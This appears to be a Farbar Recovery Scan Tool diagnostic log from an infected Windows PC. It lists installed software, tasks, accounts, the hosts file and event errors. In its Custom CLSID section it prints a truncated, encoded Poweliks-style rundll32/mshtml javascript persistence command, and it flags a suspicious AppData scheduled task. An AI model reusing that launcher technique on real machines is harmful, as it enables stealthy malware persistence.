Java 7 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.600 - Oracle)
Jazzpunk (HKLM-x32\...\Steam App 250260) (Version: - Necrophone Games)
Kerbal Space Program (HKLM-x32\...\Steam App 220200) (Version: - Squad)
Khet 2.0 (HKLM-x32\...\Steam App 312720) (Version: - BlueLine Games)
Killing Floor (HKLM-x32\...\Steam App 1250) (Version: - Tripwire Interactive)
Kinetic Void (HKLM-x32\...\Steam App 227160) (Version: - Badland Studio)
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.)
LYNE (HKLM-x32\...\Steam App 266010) (Version: - Thomas Bowker)
Magicka (HKLM-x32\...\Steam App 42910) (Version: - Arrowhead Game Studios)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Max Payne 2: The Fall of Max Payne (HKLM-x32\...\Steam App 12150) (Version: - Remedy Entertainment)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Project Professional 2010 (HKLM-x32\...\Office14.PRJPRO) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visio Professional 2010 (HKLM-x32\...\Office14.VISIO) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Mini Metro (HKLM-x32\...\Steam App 287980) (Version: - Dinosaur Polo Club)
Monaco (HKLM-x32\...\Steam App 113020) (Version: - Pocketwatch Games)
Mount & Blade: Warband (HKLM-x32\...\Steam App 48700) (Version: - TaleWorlds Entertainment)
Mount & Blade: With Fire and Sword (HKLM-x32\...\Steam App 48720) (Version: - TaleWorlds Entertainment)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Multiwinia (HKLM-x32\...\Steam App 1530) (Version: - Introversion Software)
Nidhogg (HKLM-x32\...\Steam App 94400) (Version: - Messhof)
Nosferatu: The Wrath of Malachi (HKLM-x32\...\Steam App 283290) (Version: - Idol FX)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.7 - )
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.81.34.0 - Overwolf Ltd.)
PANTECH Handset USB Driver (HKLM\...\{B9676D15-E0EC-42c2-8C16-F3D9648C44AF}) (Version: 1.1.4580.1215 - PANTECH CO,.LTD)
Pantech PCSuite (HKLM-x32\...\{69187EC5-F5CF-4B2C-B920-5A17F44D9685}) (Version: 1.0 - Pantech)
Pantech PCSuite (x32 Version: 1.0 - Pantech) Hidden
Papers, Please (HKLM-x32\...\Steam App 239030) (Version: - 3909)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)
PAYDAY: The Heist (HKLM-x32\...\Steam App 24240) (Version: - OVERKILL Software)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.5.1 - Frank Heindörfer, Philip Chinery)
Plantronics® GameCom 780 Software for Dolby® Headphone (HKLM-x32\...\{EB3C9064-9140-4279-9E51-965119402151}) (Version: 1.00.0001 - Plantronics)
Prison Architect (HKLM-x32\...\Steam App 233450) (Version: - Introversion Software)
Prototype (HKLM-x32\...\Steam App 10150) (Version: - Radical Entertainment)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Quake III Arena (HKLM-x32\...\Steam App 2200) (Version: - id Software)
Raptr (HKLM-x32\...\Raptr) (Version: - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5886 - Realtek Semiconductor Corp.)
Receiver (HKLM-x32\...\Steam App 234190) (Version: - Wolfire Games)
Return to Castle Wolfenstein (HKLM-x32\...\Steam App 9010) (Version: - Gray Matter Studios)
Risk of Rain (HKLM-x32\...\Steam App 248820) (Version: - )
Rogue Shooter: The FPS Roguelike (HKLM-x32\...\Steam App 295770) (Version: - Hippomancer)
RollerCoaster Tycoon 2: Triple Thrill Pack (HKLM-x32\...\Steam App 285330) (Version: - Chris Sawyer Productions)
RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version: - Frontier)
RUNNING WITH RIFLES (HKLM-x32\...\Steam App 270150) (Version: - Modulaatio Games)
Safecracker: The Ultimate Puzzle Adventure (HKLM-x32\...\Steam App 3260) (Version: - Kheops Studio)
Sang-Froid - Tales of Werewolves (HKLM-x32\...\Steam App 227220) (Version: - Artifice Studio)
Secrets of Rætikon (HKLM-x32\...\Steam App 246680) (Version: - Broken Rules)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003B-0000-0000-0000000FF1CE}_Office14.PRJPRO_{58FA40EF-ABA9-4FED-AD3D-318A6073934D}) (Version: - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0057-0000-0000-0000000FF1CE}_Office14.VISIO_{359ADBEC-068A-4CC9-9174-77AB8EDB867A}) (Version: - Microsoft)
Shadowgate (HKLM-x32\...\Steam App 294440) (Version: - Zojoi)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
SpaceChem (HKLM-x32\...\Steam App 92800) (Version: - Zachtronics)
SpinFire 9.0 Core (x32 Version: 9.0.1435.1435 - Actify, Inc) Hidden
Star Wars: Knights of the Old Republic (HKLM-x32\...\Steam App 32370) (Version: - BioWare)
Starbound (HKLM-x32\...\Steam App 211820) (Version: - )
Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)
Sunless Sea (HKLM-x32\...\Steam App 304650) (Version: - Failbetter Games)
TeamSpeak 3 Client (HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\TeamSpeak 3 Client) (Version: 3.0.15 - TeamSpeak Systems GmbH)
Teleglitch: Die More Edition (HKLM-x32\...\Steam App 234390) (Version: - Test3 Projects)
Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic)
The Binding of Isaac (HKLM-x32\...\Steam App 113200) (Version: - Edmund McMillen and Florian Himsl)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version: - Nicalis, Inc.)
The Escapists (HKLM-x32\...\Steam App 298630) (Version: - Mouldy Toof Studios)
The Secret of Monkey Island: Special Edition (HKLM-x32\...\Steam App 32360) (Version: - LucasArts)
The Talos Principle Public Test (HKLM-x32\...\Steam App 330710) (Version: - Croteam)
TightVNC 2.0.2 (HKLM-x32\...\TightVNC) (Version: 2.0.2 - GlavSoft LLC.)
Unity Web Player (HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\UnityWebPlayer) (Version: - Unity Technologies ApS)
Uplay (HKLM-x32\...\Uplay) (Version: 2.0 - Ubisoft)
Valiant Hearts: The Great War™ / Soldats Inconnus : Mémoires de la Grande Guerre™ (HKLM-x32\...\Steam App 260230) (Version: - Ubisoft Montpellier)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
World of Goo (HKLM-x32\...\Steam App 22000) (Version: - 2D BOY)
Ziggurat (HKLM-x32\...\Steam App 308420) (Version: - Milkstone Studios)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2217723503-548262416-3983414958-1007_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points =========================

10-11-2014 00:40:03 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2012-08-14 09:13 - 00000968 ____A C:\Windows\system32\Drivers\etc\hosts
10.100.5.252 bmtex2010
172.20.16.155 grfdfs
10.100.5.50 stl2k3ns1
10.100.5.51 stl2k3ns2
10.100.5.52 stl2k3dc1
10.100.5.53 stl2k3dc2

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {2F324146-BA28-46F8-A8E2-C8E487EF7EBB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)
Task: {482D745E-ECAD-4DD7-ABB2-87622D2AD612} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {5447ECDB-2C78-401D-BFAE-F7C6E6F830AF} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2014-10-22] (Overwolf LTD)
Task: {A9237A40-FCB0-40E2-B712-4D310799122D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {AA3A2AC5-53FF-4D70-B6F1-39A55FA7BA06} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {AAFD7EB2-F0DF-4E39-8C89-8F15B716ED81} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {B3E7C114-D31F-402A-9253-A4FB8DCB1E3B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)
Task: {DF3E1F4C-B60E-4DFD-93A5-91A4BD728439} - System32\Tasks\{44A1741A-3325-5E3D-3774-F73A5D212500} => C:\Users\Calahan\AppData\Roaming\BMMCegjc\BfVFqtQW\sSmQiMZV\HDDIaJDbA.exe <==== ATTENTION
Task: {E9004E9C-6652-4A05-ABDD-0AE18E65854F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {EF3C8A0C-24A9-4BAE-9739-B91FE7A27393} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2014-02-28 17:18 - 2014-02-28 17:18 - 00075136 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:23 - 2010-10-20 14:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2010-01-02 09:42 - 2010-01-02 09:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2009-11-24 18:36 - 2009-11-24 18:36 - 00125440 _____ () C:\Program Files (x86)\Notepad++\NppShell_01.dll
2014-06-27 17:44 - 2011-12-01 14:15 - 00777448 ____N () C:\Program Files\Plantronics\GameCom780\GameCom780.exe
2012-09-13 00:38 - 2012-09-13 00:38 - 00264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2014-11-10 21:15 - 2014-11-10 21:16 - 00380416 _____ () C:\Users\Calahan\Downloads\nffvqpeh.exe
2014-06-27 17:44 - 2011-12-01 14:16 - 00150760 ____N () C:\Program Files\Plantronics\GameCom780\VmixPLGC.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 02144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 07955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2012-09-13 00:39 - 2012-09-13 00:39 - 00336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:45 - 2010-10-20 14:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2011-11-08 15:46 - 2011-11-08 15:46 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
2014-10-29 11:26 - 2014-10-21 23:05 - 14902600 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-2217723503-548262416-3983414958-500 - Administrator - Disabled) => C:\Users\Administrator.cvci20462
Calahan (S-1-5-21-2217723503-548262416-3983414958-1007 - Administrator - Enabled) => C:\Users\Calahan
Elisa (S-1-5-21-2217723503-548262416-3983414958-1006 - Limited - Enabled) => C:\Users\Elisa
Guest (S-1-5-21-2217723503-548262416-3983414958-501 - Limited - Enabled) => C:\Users\Guest
HomeGroupUser$ (S-1-5-21-2217723503-548262416-3983414958-1003 - Limited - Enabled)
Logan (S-1-5-21-2217723503-548262416-3983414958-1005 - Administrator - Enabled) => C:\Users\Logan
Mike2 (S-1-5-21-2217723503-548262416-3983414958-1004 - Administrator - Enabled) => C:\Users\Mike2

==================== Faulty Device Manager Devices =============

Name: PS/2 Compatible Mouse
Description: PS/2 Compatible Mouse
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly.
The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.
Remove the device, and this error should be resolved.

==================== Event log errors: =========================

Application errors:
==================
Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)
Description: Product: Adobe Reader XI - Update '{AC76BA86-7AD7-0000-2550-7A8C40011009}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127

Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: accrdsub.exe, version: 6.2.1.52, time stamp: 0x4a266469
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521eaf24
Exception code: 0xc0000005
Fault offset: 0x0000000000052eef
Faulting process id: 0x838
Faulting application start time: 0xaccrdsub.exe0
Faulting application path: accrdsub.exe1
Faulting module path: accrdsub.exe2
Report Id: accrdsub.exe3

Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x08356020
Faulting process id: 0x4bc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0840e020
Faulting process id: 0x2e2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 9.0.8112.16584 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 2074
Start Time: 01cffc98a2a67803
Termination Time: 10
Application Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Report Id: e82a2d01-688b-11e4-a553-6c626d9e55b8

Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x541caffd
Faulting module name: WININET.dll, version: 9.0.8112.16584, time stamp: 0x541cb050
Exception code: 0xc0000005
Fault offset: 0x000d4825
Faulting process id: 0x3230
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50ed
Faulting module name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50ed
Exception code: 0xc0000005
Fault offset: 0x004232b5
Faulting process id: 0x2c4c
Faulting application start time: 0xFalloutNV.exe0
Faulting application path: FalloutNV.exe1
Faulting module path: FalloutNV.exe2
Report Id: FalloutNV.exe3

Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 38.0.2125.111, time stamp: 0x5447163b
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7
Exception code: 0xc0000374
Fault offset: 0x000ce753
Faulting process id: 0xc10
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3

Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp

Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp

System errors:
=============
Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (11/10/2014 08:22:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The HP Health Check Service service failed to start due to the following error: %%2

Error: (11/10/2014 08:21:45 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/10/2014 08:18:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DameWare Mini Remote Control service failed to start due to the following error: %%3

Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068

Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068

Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068

Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068

Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068

Microsoft Office Sessions:
=========================
Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)
Description: Adobe Reader XI{AC76BA86-7AD7-0000-2550-7A8C40011009}1625(NULL)(NULL)(NULL)

Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: accrdsub.exe6.2.1.524a266469ntdll.dll6.1.7601.18247521eaf24c00000050000000000052eef83801cff7cbaa298beaC:\Program Files\ActivIdentity\ActivClient\accrdsub.exeC:\Windows\SYSTEM32\ntdll.dllb5425d6b-6934-11e4-a553-6c626d9e55b8

Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c0000005083560204bc01cffc99acb61f44C:\Program Files\Internet Explorer\iexplore.exeunknown07177948-688d-11e4-a553-6c626d9e55b8

Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c00000050840e0202e2c01cffc99acb58302C:\Program Files\Internet Explorer\iexplore.exeunknown0717a058-688d-11e4-a553-6c626d9e55b8

Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe9.0.8112.16584207401cffc98a2a6780310C:\Program Files (x86)\Internet Explorer\iexplore.exee82a2d01-688b-11e4-a553-6c626d9e55b8

Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.16584541caffdWININET.dll9.0.8112.16584541cb050c0000005000d4825323001cffc98a390db72C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\syswow64\WININET.dlle64fc0be-688b-11e4-a553-6c626d9e55b8

Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )
